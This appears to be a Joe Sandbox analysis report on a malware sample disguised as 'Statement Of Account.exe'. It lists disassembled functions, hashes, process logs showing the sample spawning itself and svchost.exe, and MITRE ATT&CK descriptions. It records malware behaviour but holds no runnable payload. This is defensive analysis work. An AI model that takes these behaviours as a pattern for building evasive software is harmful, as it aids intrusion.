Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768

Function 004515AB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 004515DA
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA

Strings

edit, xrefs: 00451651

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729

Function 00474827 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00474833
GlobalMemoryStatusEx.KERNEL32 ref: 00474846

Strings

@, xrefs: 0047483E

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
Instruction ID: 41c327e25453105c4ca6c880754d33c67e761007402a238c65fd2e715fefe222
Opcode Fuzzy Hash: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F

Function 004647A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(?), ref: 004647C7
htons.WS2_32(?), ref: 00464827

Strings

255.255.255.255, xrefs: 004647DC

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
Instruction ID: e3b5e028fda38c0aed97ec3d425ece65e45bc088e5f3683a6f0e3ee8de0e9224
Opcode Fuzzy Hash: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
Instruction Fuzzy Hash: 6F11253620030057DA10EB69C882F9BB394EFC4728F00896BFA105B283D679F45A832E

Function 004694DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547

Strings

ComboBox, xrefs: 004694E9
ListBox, xrefs: 00469512

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend_wcslen
String ID: ComboBox$ListBox
API String ID: 455545452-1403004172
Opcode ID: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
Instruction ID: d7878a024921556205560296ec06e6abf53b779169672b4943ab7ad66f70e2c7
Opcode Fuzzy Hash: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A

Function 00442AFE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C

Strings

<local>, xrefs: 00442B48

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: InternetOpen
String ID: <local>
API String ID: 2038078732-4266983199
Opcode ID: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
Instruction ID: 525aca290fb55aeb65c4bf55ca0deee88c9418ef2a1db54778758d1eb2e06c8a
Opcode Fuzzy Hash: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
Instruction Fuzzy Hash: 9011A934144751AAF621DF108D86FB77794FB50B01F50480FF9866B2C0D6F4B848C766

Function 004695F7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660

Strings

ComboBox, xrefs: 00469602
ListBox, xrefs: 0046962B

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend_wcslen
String ID: ComboBox$ListBox
API String ID: 455545452-1403004172
Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
Instruction ID: 486d2595d5a7427da4a9c048e684990a8dc9cac685a8154682435d05c4426571
Opcode Fuzzy Hash: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA

Function 0046956F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6

Strings

ComboBox, xrefs: 0046957A
ListBox, xrefs: 004695A3

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend_wcslen
String ID: ComboBox$ListBox
API String ID: 455545452-1403004172
Opcode ID: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
Instruction ID: 72d13aeac174e9c1a3a177398698555a642000804846b33da1492f44d6438514
Opcode Fuzzy Hash: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
Instruction Fuzzy Hash: 4D01A77374111067C610BA6A9C01AEB739CABD2364F44443BF94597292EA7DED0E43AA

Function 00461774 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 00461796
_strncmp.LIBCMT ref: 004617BC
_strncmp.LIBCMT ref: 004618F1

Strings

UTF8), xrefs: 00461790
,, xrefs: 004618D8

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: _strncmp
String ID: ,$UTF8)
API String ID: 909875538-2632631837
Opcode ID: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
Instruction ID: 35c0b5e4e6bd282640ba12729024cfd3588da47ca1ed1c49f01331a057b7ec9b
Opcode Fuzzy Hash: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
Instruction Fuzzy Hash: 7601B575A083805BE720DE20CC85BA773A1AB81319F58492ED8D5872A1F73DD449C75B

Function 00461772 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 00461796
_strncmp.LIBCMT ref: 004617BC
_strncmp.LIBCMT ref: 004618F1

Strings

UTF8), xrefs: 00461790
,, xrefs: 004618D8

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: _strncmp
String ID: ,$UTF8)
API String ID: 909875538-2632631837
Opcode ID: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
Instruction ID: b3c6803870d1b21283bf32431af321d4190ac902c568a1d8b2e557ddf245ca97
Opcode Fuzzy Hash: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
Instruction Fuzzy Hash: 1E01D875A043805BE720DE20CC85B6773A19B4131AF68492FD8D6872A1F73DD449C75B

Function 004560AD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

wsprintfW.USER32 ref: 004560E9

Strings

%d/%02d/%02d, xrefs: 004560E3

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend_mallocwsprintf
String ID: %d/%02d/%02d
API String ID: 1262938277-328681919
Opcode ID: 5e9390f3fa6d631e890f8db483ee3f325bf10843f83bb080d9b0d170336394c6
Instruction ID: 2a73c44ac592e0fe880a68d863bd42ca8887a008949f121bccc13d44bcf2ebb3
Opcode Fuzzy Hash: 5e9390f3fa6d631e890f8db483ee3f325bf10843f83bb080d9b0d170336394c6
Instruction Fuzzy Hash: 13F08272744220A7E2105BA5AC01BBFB3D4EB84762F10443BFE44D12C0E66E8455D7BA

Function 00442262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044226C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0044227F

Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287

Strings

Shell_TrayWnd, xrefs: 00442265

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
Instruction ID: f0ed9326d30a696a9ade51716a531e8bd1705000bbe21894ac7a57cb5589152b
Opcode Fuzzy Hash: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
Instruction Fuzzy Hash: 71D0A772F8130177E92077706D0FFCB26246F14710F010C3AB305AA1C0D4E8D440C358

Function 0044222A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
PostMessageW.USER32(00000000), ref: 00442247

Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287

Strings

Shell_TrayWnd, xrefs: 00442239

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
Instruction ID: d1e5b9be119239975405e397b0c0efdc35250005003305bf123d4268f2ecb06f
Opcode Fuzzy Hash: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358

Function 00439514 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522

Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B

Strings

Error allocating memory., xrefs: 0043951B
AutoIt, xrefs: 00439516

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
Instruction ID: 5d68346425d2699d55792fe39b85c2381918ba1f955abba655776c5540820644
Opcode Fuzzy Hash: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E

Source: unknown	Process created: C:\Users\user\Desktop\Statement Of Account.exe "C:\Users\user\Desktop\Statement Of Account.exe"
Source: C:\Users\user\Desktop\Statement Of Account.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe"
Source: C:\Users\user\Desktop\Statement Of Account.exe	Process created: C:\Users\user\Desktop\Statement Of Account.exe "C:\Users\user\Desktop\Statement Of Account.exe"
Source: C:\Users\user\Desktop\Statement Of Account.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe"
Source: C:\Users\user\Desktop\Statement Of Account.exe	Process created: C:\Users\user\Desktop\Statement Of Account.exe "C:\Users\user\Desktop\Statement Of Account.exe"
Source: C:\Users\user\Desktop\Statement Of Account.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe"
Source: C:\Users\user\Desktop\Statement Of Account.exe	Process created: C:\Users\user\Desktop\Statement Of Account.exe "C:\Users\user\Desktop\Statement Of Account.exe"
Source: C:\Users\user\Desktop\Statement Of Account.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe"
Source: C:\Users\user\Desktop\Statement Of Account.exe	Process created: C:\Users\user\Desktop\Statement Of Account.exe "C:\Users\user\Desktop\Statement Of Account.exe"
Source: C:\Users\user\Desktop\Statement Of Account.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe"
Source: C:\Users\user\Desktop\Statement Of Account.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Process created: C:\Users\user\Desktop\Statement Of Account.exe "C:\Users\user\Desktop\Statement Of Account.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Process created: C:\Users\user\Desktop\Statement Of Account.exe "C:\Users\user\Desktop\Statement Of Account.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Process created: C:\Users\user\Desktop\Statement Of Account.exe "C:\Users\user\Desktop\Statement Of Account.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Process created: C:\Users\user\Desktop\Statement Of Account.exe "C:\Users\user\Desktop\Statement Of Account.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe"	Jump to behavior

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

